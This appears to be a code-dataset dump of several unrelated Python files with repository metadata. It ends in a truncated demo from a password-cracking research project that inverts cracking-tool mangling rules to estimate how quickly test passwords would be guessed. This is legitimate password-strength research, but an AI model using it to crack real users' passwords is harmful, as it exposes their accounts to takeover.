Replicate the send-message request timestamp = int(datetime.datetime.now().timestamp() * 1000) epoch = timestamp << 22 otid = epoch + random.randrange(2 ** 22) send_message_resp = requests.post( "https://www.messenger.com/api/graphql/", cookies=login.cookies, data={ "fb_dtsg": dtsg, "doc_id": doc_id, "variables": json.dumps( { "deviceId": device_id, "requestId": 0, "requestPayload": json.dumps( { "version_id": str(schema_version), "tasks": [ { "label": "46", "payload": json.dumps( { "thread_id": args.recipient, "otid": "6870463702739115830", "source": 0, "send_type": 1, "text": args.message, "initiating_source": 1, } ), "queue_name": str(args.recipient), "task_id": 0, "failure_count": None, }, { "label": "21", "payload": json.dumps( { "thread_id": args.recipient, "last_read_watermark_ts": timestamp, "sync_group": 1, } ), "queue_name": str(args.recipient), "task_id": 1, "failure_count": None, }, ], "epoch_id": 6870463702858032000, } ), "requestType": 3, } ), }, ) print(send_message_resp.text)
959
0
81
1711dbc6d5f8418cbf2d6ff20883e3525a9a462a
1,540
py
Python
.github/actions/update-version/update-version.py
nihaals/visual-studio-code-insiders-arch
bbd4c26f4766ccab1b9a15608bd84cccaae51341
[ "MIT" ]
3
2020-09-19T19:26:11.000Z
2021-08-18T18:30:45.000Z
.github/actions/update-version/update-version.py
nihaals/visual-studio-code-insiders-arch
bbd4c26f4766ccab1b9a15608bd84cccaae51341
[ "MIT" ]
null
null
null
.github/actions/update-version/update-version.py
nihaals/visual-studio-code-insiders-arch
bbd4c26f4766ccab1b9a15608bd84cccaae51341
[ "MIT" ]
2
2020-08-17T02:29:14.000Z
2020-08-18T01:28:49.000Z
import os import re with open('PKGBUILD') as fp: for line in fp.readlines(): line = line.strip() current_build_number = re.search(r"^_pkgbuildnumber=(.+)$", line) if current_build_number is None: continue current_build_number = current_build_number.group(1) break else: raise ValueError("_pkgbuildnumber not found") latest_version = os.environ['INPUT_VERSION'] latest_build_number = os.environ['INPUT_BUILD_NUMBER'] latest_hash_x86_64 = os.environ['INPUT_SHA256_x86_64'] print(f'Current build number: {current_build_number}') print(f'Latest build number: {latest_build_number}') print(f'Latest version: {latest_version}') print(f'{latest_version}+{latest_build_number} x86_64 SHA256: {latest_hash_x86_64}') if latest_build_number.isdigit() is False: print('Latest build number is invalid') exit(1) if ' ' in latest_version or '-' in latest_version: print('Latest version is invalid') exit(1) with open('PKGBUILD') as fp: contents = fp.read() if current_build_number != latest_build_number: contents = re.sub(r"^pkgrel=.+$", 'pkgrel=1', contents, flags=re.MULTILINE) contents = re.sub(r"^_pkgbuildnumber=.+$", f'_pkgbuildnumber={latest_build_number}', contents, flags=re.MULTILINE) contents = re.sub(r"^_pkgversion=.+$", f'_pkgversion={latest_version}', contents, flags=re.MULTILINE) contents = re.sub(r"(sha256sums_x86_64=\(\n ').+'\n", f"\g<1>{latest_hash_x86_64}'\n", contents) with open('PKGBUILD', 'w') as fp: fp.write(contents)
34.222222
114
0.707143
import os import re with open('PKGBUILD') as fp: for line in fp.readlines(): line = line.strip() current_build_number = re.search(r"^_pkgbuildnumber=(.+)$", line) if current_build_number is None: continue current_build_number = current_build_number.group(1) break else: raise ValueError("_pkgbuildnumber not found") latest_version = os.environ['INPUT_VERSION'] latest_build_number = os.environ['INPUT_BUILD_NUMBER'] latest_hash_x86_64 = os.environ['INPUT_SHA256_x86_64'] print(f'Current build number: {current_build_number}') print(f'Latest build number: {latest_build_number}') print(f'Latest version: {latest_version}') print(f'{latest_version}+{latest_build_number} x86_64 SHA256: {latest_hash_x86_64}') if latest_build_number.isdigit() is False: print('Latest build number is invalid') exit(1) if ' ' in latest_version or '-' in latest_version: print('Latest version is invalid') exit(1) with open('PKGBUILD') as fp: contents = fp.read() if current_build_number != latest_build_number: contents = re.sub(r"^pkgrel=.+$", 'pkgrel=1', contents, flags=re.MULTILINE) contents = re.sub(r"^_pkgbuildnumber=.+$", f'_pkgbuildnumber={latest_build_number}', contents, flags=re.MULTILINE) contents = re.sub(r"^_pkgversion=.+$", f'_pkgversion={latest_version}', contents, flags=re.MULTILINE) contents = re.sub(r"(sha256sums_x86_64=\(\n ').+'\n", f"\g<1>{latest_hash_x86_64}'\n", contents) with open('PKGBUILD', 'w') as fp: fp.write(contents)
0
0
0
cbd4baa2dbcce74135081efb545a3df0f0b369a9
10,085
py
Python
hottbox/utils/generation/tests/test_basic.py
adamurban98/hottbox
26580018ec6d38a1b08266c04ce4408c9e276130
[ "Apache-2.0" ]
167
2018-05-07T10:31:00.000Z
2022-02-24T19:20:31.000Z
hottbox/utils/generation/tests/test_basic.py
adamurban98/hottbox
26580018ec6d38a1b08266c04ce4408c9e276130
[ "Apache-2.0" ]
19
2018-05-10T13:26:39.000Z
2020-01-31T12:49:27.000Z
hottbox/utils/generation/tests/test_basic.py
adamurban98/hottbox
26580018ec6d38a1b08266c04ce4408c9e276130
[ "Apache-2.0" ]
24
2018-04-02T17:16:50.000Z
2021-12-07T06:21:40.000Z
import pytest import numpy as np from functools import reduce from hottbox.core.structures import Tensor,TensorCPD, TensorTKD, TensorTT from hottbox.utils.validation.checks import is_super_symmetric from ..basic import dense_tensor, sparse_tensor, super_diagonal_tensor, \ super_diag_tensor, super_symmetric_tensor, residual_tensor def test_super_diag_tensor(): """ Tests for creating super-diagonal tensor""" order = 3 rank = 2 correct_shape = (rank, ) * order true_default_data = np.array([[[1., 0.], [0., 0.]], [[0., 0.], [0., 1.]]]) true_default_mode_names = ['mode-0', 'mode-1', 'mode-2'] correct_values = np.arange(rank) true_data = np.array([[[0., 0.], [0., 0.]], [[0., 0.], [0., 1.]]]) # ------ tests for default super diagonal tensor tensor = super_diag_tensor(correct_shape) assert isinstance(tensor, Tensor) np.testing.assert_array_equal(tensor.data, true_default_data) assert (tensor.mode_names == true_default_mode_names) # ------ tests for super diagonal tensor with custom values on the main diagonal tensor = super_diag_tensor(correct_shape, values=correct_values) assert isinstance(tensor, Tensor) np.testing.assert_array_equal(tensor.data, true_data) assert (tensor.mode_names == true_default_mode_names) # ------ tests that should Fail with pytest.raises(TypeError): # shape should be passed as tuple super_diag_tensor(shape=list(correct_shape)) with pytest.raises(ValueError): # all values in shape should be the same incorrect_shape = [rank] * order incorrect_shape[1] = order+1 super_diag_tensor(shape=tuple(incorrect_shape)) with pytest.raises(ValueError): # values should be an one dimensional numpy array incorrect_values = np.ones([rank, rank]) super_diag_tensor(shape=correct_shape, values=incorrect_values) with pytest.raises(ValueError): # too many values for the specified shape incorrect_values = np.ones(correct_shape[0]+1) super_diag_tensor(shape=correct_shape, values=incorrect_values) with pytest.raises(TypeError): # values should be a numpy array incorrect_values = [1] * correct_shape[0] super_diag_tensor(shape=correct_shape, values=incorrect_values) def test_residual_tensor(): """ Tests for computing/creating a residual tensor """ true_default_mode_names = ['mode-0', 'mode-1', 'mode-2'] # ------ tests for residual tensor with the Tensor array_3d = np.array([[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], [[12, 13, 14, 15], [16, 17, 18, 19], [20, 21, 22, 23]]]) true_residual_data = np.zeros(array_3d.shape) tensor_1 = Tensor(array=array_3d) tensor_2 = Tensor(array=array_3d) residual = residual_tensor(tensor_orig=tensor_1, tensor_approx=tensor_2) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests for residual tensor with the TensorCPD array_3d = np.array([[[100., 250., 400., 550.], [250., 650., 1050., 1450.], [400., 1050., 1700., 2350.]], [[250., 650., 1050., 1450.], [650., 1925., 3200., 4475.], [1050., 3200., 5350., 7500.]]] ) true_residual_data = np.zeros(array_3d.shape) tensor = Tensor(array=array_3d) ft_shape = (2, 3, 4) # define shape of the tensor in full form R = 5 # define Kryskal rank of a tensor in CP form core_values = np.ones(R) fmat = [np.arange(orig_dim * R).reshape(orig_dim, R) for orig_dim in ft_shape] tensor_cpd = TensorCPD(fmat=fmat, core_values=core_values) residual = residual_tensor(tensor_orig=tensor, tensor_approx=tensor_cpd) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests for residual tensor with the TensorTKD array_3d = np.array([[[378, 1346, 2314, 3282, 4250], [1368, 4856, 8344, 11832, 15320], [2358, 8366, 14374, 20382, 26390], [3348, 11876, 20404, 28932, 37460]], [[1458, 5146, 8834, 12522, 16210], [5112, 17944, 30776, 43608, 56440], [8766, 30742, 52718, 74694, 96670], [12420, 43540, 74660, 105780, 136900]], [[2538, 8946, 15354, 21762, 28170], [8856, 31032, 53208, 75384, 97560], [15174, 53118, 91062, 129006, 166950], [21492, 75204, 128916, 182628, 236340]]]) true_residual_data = np.zeros(array_3d.shape) tensor = Tensor(array=array_3d) ft_shape = (3, 4, 5) # define shape of the tensor in full form ml_rank = (2, 3, 4) # define multi-linear rank of a tensor in Tucker form core_size = reduce(lambda x, y: x * y, ml_rank) core_values = np.arange(core_size).reshape(ml_rank) fmat = [np.arange(ft_shape[mode] * ml_rank[mode]).reshape(ft_shape[mode], ml_rank[mode]) for mode in range(len(ft_shape))] tensor_tkd = TensorTKD(fmat=fmat, core_values=core_values) residual = residual_tensor(tensor_orig=tensor, tensor_approx=tensor_tkd) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests for residual tensor with the TensorTT array_3d = np.array([[[300, 348, 396, 444, 492, 540], [354, 411, 468, 525, 582, 639], [408, 474, 540, 606, 672, 738], [462, 537, 612, 687, 762, 837], [516, 600, 684, 768, 852, 936]], [[960, 1110, 1260, 1410, 1560, 1710], [1230, 1425, 1620, 1815, 2010, 2205], [1500, 1740, 1980, 2220, 2460, 2700], [1770, 2055, 2340, 2625, 2910, 3195], [2040, 2370, 2700, 3030, 3360, 3690]], [[1620, 1872, 2124, 2376, 2628, 2880], [2106, 2439, 2772, 3105, 3438, 3771], [2592, 3006, 3420, 3834, 4248, 4662], [3078, 3573, 4068, 4563, 5058, 5553], [3564, 4140, 4716, 5292, 5868, 6444]], [[2280, 2634, 2988, 3342, 3696, 4050], [2982, 3453, 3924, 4395, 4866, 5337], [3684, 4272, 4860, 5448, 6036, 6624], [4386, 5091, 5796, 6501, 7206, 7911], [5088, 5910, 6732, 7554, 8376, 9198]]]) true_residual_data = np.zeros(array_3d.shape) tensor = Tensor(array=array_3d) r1, r2 = 2, 3 I, J, K = 4, 5, 6 core_1 = np.arange(I * r1).reshape(I, r1) core_2 = np.arange(r1 * J * r2).reshape(r1, J, r2) core_3 = np.arange(r2 * K).reshape(r2, K) core_values = [core_1, core_2, core_3] ft_shape = (I, J, K) tensor_tt = TensorTT(core_values=core_values) residual = residual_tensor(tensor_orig=tensor, tensor_approx=tensor_tt) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests that should FAIL for residual tensor due to wrong input type array_3d = np.array([[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], [[12, 13, 14, 15], [16, 17, 18, 19], [20, 21, 22, 23]]]) tensor_1 = Tensor(array=array_3d) tensor_2 = array_3d with pytest.raises(TypeError): residual_tensor(tensor_orig=tensor_1, tensor_approx=tensor_2) tensor_1 = array_3d tensor_2 = Tensor(array=array_3d) with pytest.raises(TypeError): residual_tensor(tensor_orig=tensor_1, tensor_approx=tensor_2)
41.846473
110
0.578681
import pytest import numpy as np from functools import reduce from hottbox.core.structures import Tensor,TensorCPD, TensorTKD, TensorTT from hottbox.utils.validation.checks import is_super_symmetric from ..basic import dense_tensor, sparse_tensor, super_diagonal_tensor, \ super_diag_tensor, super_symmetric_tensor, residual_tensor def test_dense(): # TODO: test distribution true_shape = (4,3,2,3) true_distribution = 'normal' true_type = 0 tensor = dense_tensor(true_shape, true_distribution, true_type) assert isinstance(tensor, Tensor) assert true_shape == tensor.shape pct_nonzero = np.count_nonzero(tensor.data) / tensor.data.size assert pct_nonzero > 0.8 def test_sparse(): true_shape = (4,3,2,3) true_distribution = 'normal' true_type = 0 tensor = sparse_tensor(true_shape, true_distribution, true_type) assert isinstance(tensor, Tensor) assert true_shape == tensor.shape pct_nonzero = np.count_nonzero(tensor.data) / tensor.data.size assert pct_nonzero < 0.08 and pct_nonzero > 0.02 def test_superdiagonal(): true_shape = (4,4,4) true_distribution = 'ones' true_type = 0 tensor = super_diagonal_tensor(true_shape, true_distribution) assert true_shape == tensor.shape assert isinstance(tensor, Tensor) tensor = tensor.data trace = 0 for i in range(true_shape[0]): trace += tensor[i,i,i] assert trace == true_shape[0] def test_super_diag_tensor(): """ Tests for creating super-diagonal tensor""" order = 3 rank = 2 correct_shape = (rank, ) * order true_default_data = np.array([[[1., 0.], [0., 0.]], [[0., 0.], [0., 1.]]]) true_default_mode_names = ['mode-0', 'mode-1', 'mode-2'] correct_values = np.arange(rank) true_data = np.array([[[0., 0.], [0., 0.]], [[0., 0.], [0., 1.]]]) # ------ tests for default super diagonal tensor tensor = super_diag_tensor(correct_shape) assert isinstance(tensor, Tensor) np.testing.assert_array_equal(tensor.data, true_default_data) assert (tensor.mode_names == true_default_mode_names) # ------ tests for super diagonal tensor with custom values on the main diagonal tensor = super_diag_tensor(correct_shape, values=correct_values) assert isinstance(tensor, Tensor) np.testing.assert_array_equal(tensor.data, true_data) assert (tensor.mode_names == true_default_mode_names) # ------ tests that should Fail with pytest.raises(TypeError): # shape should be passed as tuple super_diag_tensor(shape=list(correct_shape)) with pytest.raises(ValueError): # all values in shape should be the same incorrect_shape = [rank] * order incorrect_shape[1] = order+1 super_diag_tensor(shape=tuple(incorrect_shape)) with pytest.raises(ValueError): # values should be an one dimensional numpy array incorrect_values = np.ones([rank, rank]) super_diag_tensor(shape=correct_shape, values=incorrect_values) with pytest.raises(ValueError): # too many values for the specified shape incorrect_values = np.ones(correct_shape[0]+1) super_diag_tensor(shape=correct_shape, values=incorrect_values) with pytest.raises(TypeError): # values should be a numpy array incorrect_values = [1] * correct_shape[0] super_diag_tensor(shape=correct_shape, values=incorrect_values) def test_supersymmetric(): true_shape = (4,4,4) tensor = super_symmetric_tensor(true_shape) assert true_shape == tensor.shape assert isinstance(tensor, Tensor) assert is_super_symmetric(tensor) def test_residual_tensor(): """ Tests for computing/creating a residual tensor """ true_default_mode_names = ['mode-0', 'mode-1', 'mode-2'] # ------ tests for residual tensor with the Tensor array_3d = np.array([[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], [[12, 13, 14, 15], [16, 17, 18, 19], [20, 21, 22, 23]]]) true_residual_data = np.zeros(array_3d.shape) tensor_1 = Tensor(array=array_3d) tensor_2 = Tensor(array=array_3d) residual = residual_tensor(tensor_orig=tensor_1, tensor_approx=tensor_2) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests for residual tensor with the TensorCPD array_3d = np.array([[[100., 250., 400., 550.], [250., 650., 1050., 1450.], [400., 1050., 1700., 2350.]], [[250., 650., 1050., 1450.], [650., 1925., 3200., 4475.], [1050., 3200., 5350., 7500.]]] ) true_residual_data = np.zeros(array_3d.shape) tensor = Tensor(array=array_3d) ft_shape = (2, 3, 4) # define shape of the tensor in full form R = 5 # define Kryskal rank of a tensor in CP form core_values = np.ones(R) fmat = [np.arange(orig_dim * R).reshape(orig_dim, R) for orig_dim in ft_shape] tensor_cpd = TensorCPD(fmat=fmat, core_values=core_values) residual = residual_tensor(tensor_orig=tensor, tensor_approx=tensor_cpd) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests for residual tensor with the TensorTKD array_3d = np.array([[[378, 1346, 2314, 3282, 4250], [1368, 4856, 8344, 11832, 15320], [2358, 8366, 14374, 20382, 26390], [3348, 11876, 20404, 28932, 37460]], [[1458, 5146, 8834, 12522, 16210], [5112, 17944, 30776, 43608, 56440], [8766, 30742, 52718, 74694, 96670], [12420, 43540, 74660, 105780, 136900]], [[2538, 8946, 15354, 21762, 28170], [8856, 31032, 53208, 75384, 97560], [15174, 53118, 91062, 129006, 166950], [21492, 75204, 128916, 182628, 236340]]]) true_residual_data = np.zeros(array_3d.shape) tensor = Tensor(array=array_3d) ft_shape = (3, 4, 5) # define shape of the tensor in full form ml_rank = (2, 3, 4) # define multi-linear rank of a tensor in Tucker form core_size = reduce(lambda x, y: x * y, ml_rank) core_values = np.arange(core_size).reshape(ml_rank) fmat = [np.arange(ft_shape[mode] * ml_rank[mode]).reshape(ft_shape[mode], ml_rank[mode]) for mode in range(len(ft_shape))] tensor_tkd = TensorTKD(fmat=fmat, core_values=core_values) residual = residual_tensor(tensor_orig=tensor, tensor_approx=tensor_tkd) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests for residual tensor with the TensorTT array_3d = np.array([[[300, 348, 396, 444, 492, 540], [354, 411, 468, 525, 582, 639], [408, 474, 540, 606, 672, 738], [462, 537, 612, 687, 762, 837], [516, 600, 684, 768, 852, 936]], [[960, 1110, 1260, 1410, 1560, 1710], [1230, 1425, 1620, 1815, 2010, 2205], [1500, 1740, 1980, 2220, 2460, 2700], [1770, 2055, 2340, 2625, 2910, 3195], [2040, 2370, 2700, 3030, 3360, 3690]], [[1620, 1872, 2124, 2376, 2628, 2880], [2106, 2439, 2772, 3105, 3438, 3771], [2592, 3006, 3420, 3834, 4248, 4662], [3078, 3573, 4068, 4563, 5058, 5553], [3564, 4140, 4716, 5292, 5868, 6444]], [[2280, 2634, 2988, 3342, 3696, 4050], [2982, 3453, 3924, 4395, 4866, 5337], [3684, 4272, 4860, 5448, 6036, 6624], [4386, 5091, 5796, 6501, 7206, 7911], [5088, 5910, 6732, 7554, 8376, 9198]]]) true_residual_data = np.zeros(array_3d.shape) tensor = Tensor(array=array_3d) r1, r2 = 2, 3 I, J, K = 4, 5, 6 core_1 = np.arange(I * r1).reshape(I, r1) core_2 = np.arange(r1 * J * r2).reshape(r1, J, r2) core_3 = np.arange(r2 * K).reshape(r2, K) core_values = [core_1, core_2, core_3] ft_shape = (I, J, K) tensor_tt = TensorTT(core_values=core_values) residual = residual_tensor(tensor_orig=tensor, tensor_approx=tensor_tt) assert isinstance(residual, Tensor) assert (residual.mode_names == true_default_mode_names) np.testing.assert_array_equal(residual.data, true_residual_data) # ------ tests that should FAIL for residual tensor due to wrong input type array_3d = np.array([[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], [[12, 13, 14, 15], [16, 17, 18, 19], [20, 21, 22, 23]]]) tensor_1 = Tensor(array=array_3d) tensor_2 = array_3d with pytest.raises(TypeError): residual_tensor(tensor_orig=tensor_1, tensor_approx=tensor_2) tensor_1 = array_3d tensor_2 = Tensor(array=array_3d) with pytest.raises(TypeError): residual_tensor(tensor_orig=tensor_1, tensor_approx=tensor_2)
1,236
0
92
3157151c02d05ab116eb33bad54d5906f6b8d1d5
2,045
py
Python
src/appengine/model.py
tomwilkie/awesomation
708a0ff2ffd431f24ed3f942cafd24882dc89620
[ "MIT" ]
28
2015-01-12T15:34:37.000Z
2021-06-17T14:27:49.000Z
src/appengine/model.py
tomwilkie/awesomation
708a0ff2ffd431f24ed3f942cafd24882dc89620
[ "MIT" ]
16
2015-01-11T21:46:08.000Z
2015-02-06T17:01:50.000Z
src/appengine/model.py
tomwilkie/awesomation
708a0ff2ffd431f24ed3f942cafd24882dc89620
[ "MIT" ]
2
2015-01-10T17:34:23.000Z
2015-01-10T18:38:01.000Z
"""Base classes for my data model.""" import decimal from google.appengine.ext import ndb from google.appengine.ext.ndb import polymodel from appengine import history, rest, user # From http://stackoverflow.com/questions/10035133/ndb-decimal-property class DecimalProperty(ndb.IntegerProperty): """Decimal property ideal to store currency values, such as $20.34.""" # See https://developers.google.com/appengine/docs/python/ndb/subclassprop class Base(polymodel.PolyModel): """Base for all objects.""" def to_dict(self): """Convert this object to a python dict.""" result = super(Base, self).to_dict() result['id'] = self.key.id() result['class'] = result['class_'][-1] del result['class_'] # Should move this into detector mixin when I figure out how if 'detector' in result: del result['detector'] return result @classmethod def _put_async(self, **ctx_options): """Overrides _put_async and sends event to UI.""" classname = self._event_classname() if classname is not None: values = self.to_dict() user.send_event(cls=classname, id=self.key.string_id(), event='update', obj=values) history.store_version(values) return super(Base, self)._put_async(**ctx_options) put_async = _put_async @rest.command def sync(self): """Called when fields on the object are updated through the API.""" pass
30.984848
76
0.672372
"""Base classes for my data model.""" import decimal from google.appengine.ext import ndb from google.appengine.ext.ndb import polymodel from appengine import history, rest, user # From http://stackoverflow.com/questions/10035133/ndb-decimal-property class DecimalProperty(ndb.IntegerProperty): """Decimal property ideal to store currency values, such as $20.34.""" # See https://developers.google.com/appengine/docs/python/ndb/subclassprop def _validate(self, value): if not isinstance(value, (decimal.Decimal, str, unicode, int, long)): raise TypeError('Expected a Decimal, str, unicode, int ' 'or long an got instead %s' % repr(value)) def _to_base_type(self, value): return int(decimal.Decimal(value) * 100) def _from_base_type(self, value): return decimal.Decimal(value)/decimal.Decimal(100) class Base(polymodel.PolyModel): """Base for all objects.""" def to_dict(self): """Convert this object to a python dict.""" result = super(Base, self).to_dict() result['id'] = self.key.id() result['class'] = result['class_'][-1] del result['class_'] # Should move this into detector mixin when I figure out how if 'detector' in result: del result['detector'] return result @classmethod def _event_classname(cls): return None def _put_async(self, **ctx_options): """Overrides _put_async and sends event to UI.""" classname = self._event_classname() if classname is not None: values = self.to_dict() user.send_event(cls=classname, id=self.key.string_id(), event='update', obj=values) history.store_version(values) return super(Base, self)._put_async(**ctx_options) put_async = _put_async @rest.command def get_history(self, start, end): values = self.to_dict() return history.get_range(values['class'], values['id'], start, end) def sync(self): """Called when fields on the object are updated through the API.""" pass
493
0
122
cedbd4d63dbf752123f11e31471ca8fd234d5f07
1,909
py
Python
Blender 2.91/2.91/scripts/addons/power_sequencer/operators/scene_cycle.py
calculusrobotics/RNNs-for-Bayesian-State-Estimation
2aacf86d2e447e10c840b4926d4de7bc5e46d9bc
[ "MIT" ]
1
2021-06-30T00:39:40.000Z
2021-06-30T00:39:40.000Z
release/scripts/addons/power_sequencer/operators/scene_cycle.py
ringsce/Rings3D
8059d1e2460fc8d6f101eff8e695f68a99f6671d
[ "Naumen", "Condor-1.1", "MS-PL" ]
null
null
null
release/scripts/addons/power_sequencer/operators/scene_cycle.py
ringsce/Rings3D
8059d1e2460fc8d6f101eff8e695f68a99f6671d
[ "Naumen", "Condor-1.1", "MS-PL" ]
null
null
null
# # Copyright (C) 2016-2020 by Nathan Lovato, Daniel Oakey, Razvan Radulescu, and contributors # # This file is part of Power Sequencer. # # Power Sequencer is free software: you can redistribute it and/or modify it under the terms of the # GNU General Public License as published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # Power Sequencer is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with Power Sequencer. If # not, see <https://www.gnu.org/licenses/>. # import bpy from .utils.doc import doc_name, doc_idname, doc_brief, doc_description class POWER_SEQUENCER_OT_scene_cycle(bpy.types.Operator): """ Cycle through scenes """ doc = { "name": doc_name(__qualname__), "demo": "https://i.imgur.com/7zhq8Tg.gif", "description": doc_description(__doc__), "shortcuts": [({"type": "TAB", "value": "PRESS", "shift": True}, {}, "Cycle Scenes")], "keymap": "Sequencer", } bl_idname = doc_idname(__qualname__) bl_label = doc["name"] bl_description = doc_brief(doc["description"]) bl_options = {"REGISTER", "UNDO"} @classmethod
34.709091
99
0.675746
# # Copyright (C) 2016-2020 by Nathan Lovato, Daniel Oakey, Razvan Radulescu, and contributors # # This file is part of Power Sequencer. # # Power Sequencer is free software: you can redistribute it and/or modify it under the terms of the # GNU General Public License as published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # Power Sequencer is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with Power Sequencer. If # not, see <https://www.gnu.org/licenses/>. # import bpy from .utils.doc import doc_name, doc_idname, doc_brief, doc_description class POWER_SEQUENCER_OT_scene_cycle(bpy.types.Operator): """ Cycle through scenes """ doc = { "name": doc_name(__qualname__), "demo": "https://i.imgur.com/7zhq8Tg.gif", "description": doc_description(__doc__), "shortcuts": [({"type": "TAB", "value": "PRESS", "shift": True}, {}, "Cycle Scenes")], "keymap": "Sequencer", } bl_idname = doc_idname(__qualname__) bl_label = doc["name"] bl_description = doc_brief(doc["description"]) bl_options = {"REGISTER", "UNDO"} @classmethod def poll(cls, context): return bpy.data.scenes def execute(self, context): scenes = bpy.data.scenes scene_count = len(scenes) if context.screen.is_animation_playing: bpy.ops.screen.animation_cancel(restore_frame=False) for index in range(scene_count): if context.scene == scenes[index]: context.window.scene = scenes[(index + 1) % scene_count] break return {"FINISHED"}
432
0
53
df341bd8c114208ae94cc128e9c72342d72f8af5
8,094
py
Python
demo/demo_guess_count_file.py
UChicagoSUPERgroup/analytic-password-cracking
1c30153e852af36ffdc0566c949f63d9736105f8
[ "MIT" ]
22
2019-05-20T16:43:16.000Z
2021-04-23T09:32:11.000Z
demo/demo_guess_count_file.py
UChicagoSUPERgroup/analytic-password-cracking
1c30153e852af36ffdc0566c949f63d9736105f8
[ "MIT" ]
null
null
null
demo/demo_guess_count_file.py
UChicagoSUPERgroup/analytic-password-cracking
1c30153e852af36ffdc0566c949f63d9736105f8
[ "MIT" ]
6
2019-05-20T18:01:05.000Z
2020-11-12T07:54:33.000Z
from sys import path as sys_path from os import path as os_path from subprocess import Popen, PIPE import time import logging import warnings import numpy as np sys_path.append(os_path.abspath('../src')) from config import RUNTIME_CONFIG from config import john_nick_names, hc_nick_names from common import PasswordPolicyConf, FilePath from argparsing import setup_args, parse_args from guess_count import GuessCount from tokenstr import TokenString from utility import read_passwords,read_wordlist,read_rulelist,get_look_cmd,build_trie_from_wordlist from utility import filter_passwords_with_password_policy from preprocess import precomputation from invert_rule import invert_one_rule from demo_common import match_inversion_result, search_exist_data, search_trie, estimate_guess_number def start_processing(): """ Take in a wordlist, rulelist and test set, outputs the guessability and guess number of each pwd in the test set. Steps: 1. read rulelist and do precomputation (detect invertibility) 2. read wordlist/pwlist, and get count for each rule 3. Rule Inversion (for each rule, invert all pwds) """ stime = time.perf_counter() ##################### Precomputation and Other Preparation ##################### # initialize a bash exe for communication external_bash_process = Popen(['/bin/bash'], stdin=PIPE, stdout=PIPE) # Logging Basic Info logging.basicConfig(filename=RUNTIME_CONFIG.get_log_addr(),level=logging.DEBUG) logging.info("Starting Time: {}\n\nConfigurations: {}\n".format(time.strftime("%Y-%m-%d %H:%M"), RUNTIME_CONFIG.short_config_string())) logging.info("PasswordPolicy: {}\n".format(RUNTIME_CONFIG['password_policy'].to_debug_string())) print("Reading Rulelist\n") rulelist = read_rulelist(RUNTIME_CONFIG['rulelist_path']['name'], RUNTIME_CONFIG['rulelist_path']['prefix']) print("Start Precomputation\n") rulelist = precomputation(rulelist) print("Reading Wordlist and Password Set\n") wordlist = read_wordlist(RUNTIME_CONFIG['wordlist_path']['name'], RUNTIME_CONFIG['wordlist_path']['prefix']) # Computing Guess Count counts, cumsum = GuessCount.get_counts(wordlist, rulelist, RUNTIME_CONFIG['preprocess_path']) # read other things pwlist = read_passwords(RUNTIME_CONFIG['pwlist_path']['addr']) # filter out pwds not consistent with the policy not_filtered_pwds, filtered_pwds = filter_passwords_with_password_policy(pwlist) trie = build_trie_from_wordlist(wordlist) ##################### Start Inversion ##################### print("Start Inverting Rules\n") i_time = time.perf_counter() # guessability of pwds is_guessable = [False] * len(pwlist) is_enable_regex = RUNTIME_CONFIG['enable_regex'] is_debug = RUNTIME_CONFIG['debug'] lookup_threshold = RUNTIME_CONFIG['lookup_threshold'] # tokenize pwds once. tokenized_pwds = [TokenString(pwd) for pw_idx, pwd in not_filtered_pwds] # invert rules (with special memory handling and other staff) for r_idx, r in enumerate(rulelist): if is_debug == True: print(r.raw) if r.feasibility.is_invertible(): # invertible, if blow up, use trie for token_pwd, (pw_idx, pwd) in zip(tokenized_pwds,not_filtered_pwds): result = invert_one_rule(token_pwd,r,is_enable_regex,r.feasibility.special_idx) if result.is_normal(): if result.get_number_of_strings() <= lookup_threshold: ret_vals = match_inversion_result(result, wordlist) else: ret_vals = search_trie(result, trie) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) elif result.is_out_of_scope(): ret_vals = [] logging.info("Inversion error for {}(RL) {}(pw), error msg: {}\n".format(r.raw, pwd, "out_of_scope")) print("Inversion error for {}(RL) {}(pw), error msg: {}".format(r.raw, pwd, "out_of_scope")) else: ret_vals = [] logging.info("Inversion error for {}(RL) {}(pw), error msg: {}\n".format(r.raw, pwd, result.error_msg)) print("Inversion error for {}(RL) {}(pw), error msg: {}".format(r.raw, pwd, result.error_msg)) elif r.feasibility.is_optimizable(): # uninvertible, if cannot handle, binary # where the binary file is stored enumerated_data_addr = "{}/enumerated/rule{}.txt".format(RUNTIME_CONFIG['preprocess_path'],r_idx) for token_pwd, (pw_idx, pwd) in zip(tokenized_pwds,not_filtered_pwds): result = invert_one_rule(token_pwd,r,is_enable_regex) if result.is_normal(): if result.get_number_of_strings() <= lookup_threshold: ret_vals = match_inversion_result(result, wordlist) else: ret_vals = 